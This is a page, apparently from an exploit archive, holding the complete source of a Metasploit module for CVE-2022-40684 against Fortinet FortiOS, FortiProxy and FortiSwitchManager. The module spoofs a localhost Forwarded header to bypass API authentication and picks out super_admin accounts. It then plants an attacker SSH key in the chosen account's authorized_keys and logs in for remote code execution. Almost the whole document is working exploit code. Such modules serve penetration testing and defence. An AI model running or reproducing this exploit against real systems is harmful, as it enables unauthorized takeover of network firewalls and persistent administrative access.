Fortinet FortiOS / FortiProxy / FortiSwitchManager Authentication Bypass

This Metasploit module exploits an authentication bypass vulnerability in the Fortinet FortiOS, FortiProxy, and FortiSwitchManager API to gain access to a chosen account and then adds an SSH key to the authorized_keys file of the chosen account, allowing you to login to the system with the chosen account. Successful exploitation results in remote code execution.


SHA-256 | 818eeb4d404c8cde2ab69451948a6037ca08bef60e2be65eb6fe9ed9d7ef0e7d

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::SSH
prepend Msf::Exploit::Remote::AutoCheck

attr_accessor :ssh_socket

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass.',
'Description' => %q{
This module exploits an authentication bypass vulnerability
in the Fortinet FortiOS, FortiProxy, and FortiSwitchManager API
to gain access to a chosen account. And then add a SSH key to the
authorized_keys file of the chosen account, allowing
to login to the system with the chosen account.

Successful exploitation results in remote code execution.
},
'Author' => [
'Heyder Andrade <@HeyderAndrade>', # Metasploit module
'Zach Hanley <@hacks_zach>', # PoC
],
'References' => [
['CVE', '2022-40684'],
['URL', 'https://www.fortiguard.com/psirt/FG-IR-22-377'],
['URL', 'https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684'],
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2022-10-10', # Vendor advisory
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD],
'Privileged' => true,
'Targets' => [
[
'FortiOS',
{
'DefaultOptions' => {
'PAYLOAD' => 'generic/ssh/interact'
},
'Payload' => {
'Compat' => {
'PayloadType' => 'ssh_interact'
}
}
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [
IOC_IN_LOGS,
ARTIFACTS_ON_DISK # SSH key is added to authorized_keys file
]
}
)
)

register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the Fortinet CMDB API', '/api/v2/cmdb/']),
OptString.new('USERNAME', [false, 'Target username (Default: auto-detect)', nil]),
OptString.new('PRIVATE_KEY', [false, 'SSH private key file path', nil]),
OptString.new('KEY_PASS', [false, 'SSH private key password', nil]),
OptString.new('SSH_RPORT', [true, 'SSH port to connect to', 22]),
OptBool.new('PREFER_ADMIN', [false, 'Prefer to use the admin user if one is detected', true])
]
)
end

def username
if datastore['USERNAME']
@username ||= datastore['USERNAME']
else
@username ||= detect_username
end
end

def ssh_rport
datastore['SSH_RPORT']
end

def current_keys
@current_keys ||= read_keys
end

def ssh_keygen
# ssh-keygen -t rsa -m PEM -f `openssl rand -hex 8`
if datastore['PRIVATE_KEY']
@ssh_keygen ||= Net::SSH::KeyFactory.load_data_private_key(
File.read(datastore['PRIVATE_KEY']),
datastore['KEY_PASS'],
datastore['PRIVATE_KEY']
)
else
@ssh_keygen ||= OpenSSL::PKey::EC.generate('prime256v1')
end
end

def ssh_private_key
ssh_keygen.to_pem
end

def ssh_pubkey
Rex::Text.encode_base64(ssh_keygen.public_key.to_blob)
end

def authorized_keys
pubkey = Rex::Text.encode_base64(ssh_keygen.public_key.to_blob)
"#{ssh_keygen.ssh_type} #{pubkey} #{username}@localhost"
end

def fortinet_request(params = {})
send_request_cgi(
{
'ctype' => 'application/json',
'agent' => 'Report Runner',
'headers' => {
'Forwarded' => "for=\"[127.0.0.1]:#{rand(1024..65535)}\";by=\"[127.0.0.1]:#{rand(1024..65535)}\""
}
}.merge(params)
)
end

def check
vprint_status("Checking #{datastore['RHOST']}:#{datastore['RPORT']}")
# a normal request to the API should return a 401
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, Rex::Text.rand_text_alpha_lower(6)),
'ctype' => 'application/json'
})

return CheckCode::Unknown('Target did not respond to check.') unless res
return CheckCode::Safe('Target seems not affected by this vulnerability.') unless res.code == 401

# Trying to bypasss the authentication and get the sshkey from the current targeted user it should return a 200 if vulnerable
res = fortinet_request({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/system/status')
})

return CheckCode::Safe unless res&.code == 200

version = res.get_json_document['version']

print_good("Target is running the version #{version}, which is vulnerable.")

Socket.tcp(rhost, ssh_rport, connect_timeout: datastore['SSH_TIMEOUT']) { |sock| return CheckCode::Safe('However SSH is not open, so adding a ssh key wouldn\t give you access to the host.') unless sock }

CheckCode::Vulnerable('And SSH is running which makes it exploitable.')
end

def cleanup
return unless ssh_socket

# it assumes our key is the last one and set it to a random text. The API didn't respond to DELETE method
data = {
"ssh-public-key#{current_keys.empty? ? '1' : current_keys.size}" => '""'
}

fortinet_request({
'method' => 'PUT',
'uri' => normalize_uri(target_uri.path, '/system/admin/', username),
'data' => data.to_json
})
end

def detect_username
vprint_status('User auto-detection...')
res = fortinet_request(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/system/admin')
)
users = res.get_json_document['results'].collect { |e| e['name'] if (e['accprofile'] == 'super_admin' && e['trusthost1'] == '0.0.0.0 0.0.0.0') }.compact
# we prefer to use admin, but if it doesn't exist we chose a random one.
if datastore['PREFER_ADMIN']
vprint_status("PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, but if it isn't found we will pick a random one.")
users.include?('admin') ? 'admin' : users.sample
else
vprint_status("PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, we will get a random that is not the admin.")
(users - ['admin']).sample
end
end

def add_ssh_key
if current_keys.include?(authorized_keys)
# then we'll remove that on cleanup
print_good('Your key is already in the authorized_keys file')
return
end
vprint_status('Adding SSH key to authorized_keys file')
# Adding the SSH key as the last entry in the authorized_keys file
keystoadd = current_keys.first(2) + [authorized_keys]
data = keystoadd.map.with_index { |key, idx| ["ssh-public-key#{idx + 1}", "\"#{key}\""] }.to_h

res = fortinet_request({
'method' => 'PUT',
'uri' => normalize_uri(target_uri.path, '/system/admin/', username),
'data' => data.to_json
})
fail_with(Failure::UnexpectedReply, 'Failed to add SSH key to authorized_keys file.') unless res&.code == 500
body = res.get_json_document
fail_with(Failure::UnexpectedReply, 'Unexpected reponse from the server after adding the key.') unless body.key?('cli_error') && body['cli_error'] =~ /SSH key is good/
end

def read_keys
vprint_status('Reading SSH key from authorized_keys file')
res = fortinet_request({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/system/admin/', username)
})
fail_with(Failure::UnexpectedReply, 'Failed read current SSH keys') unless res&.code == 200
result = res.get_json_document['results'].first
['ssh-public-key1', 'ssh-public-key2', 'ssh-public-key3'].map do |key|
result[key].gsub('"', '') unless result[key].empty?
end.compact
end

def do_login(ssh_options)
# ensure we don't have a stale socket hanging around
ssh_options[:proxy].proxies = nil if ssh_options[:proxy]
begin
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
self.ssh_socket = Net::SSH.start(rhost, username, ssh_options)
end
rescue Rex::ConnectionError
fail_with(Failure::Unreachable, 'Disconnected during negotiation')
rescue Net::SSH::Disconnect, ::EOFError
fail_with(Failure::Disconnected, 'Timed out during negotiation')
rescue Net::SSH::AuthenticationFailed
fail_with(Failure::NoAccess, 'Failed authentication')
rescue Net::SSH::Exception => e
fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")
end

fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket
end

def exploit
print_status("Executing exploit on #{datastore['RHOST']}:#{datastore['RPORT']} target user: #{username}")
add_ssh_key
vprint_status('Establishing SSH connection')
ssh_options = ssh_client_defaults.merge({
auth_methods: ['publickey'],
key_data: [ ssh_private_key ],
port: ssh_rport
})
ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG']

do_login(ssh_options)

handler(ssh_socket)
end
end

Related Posts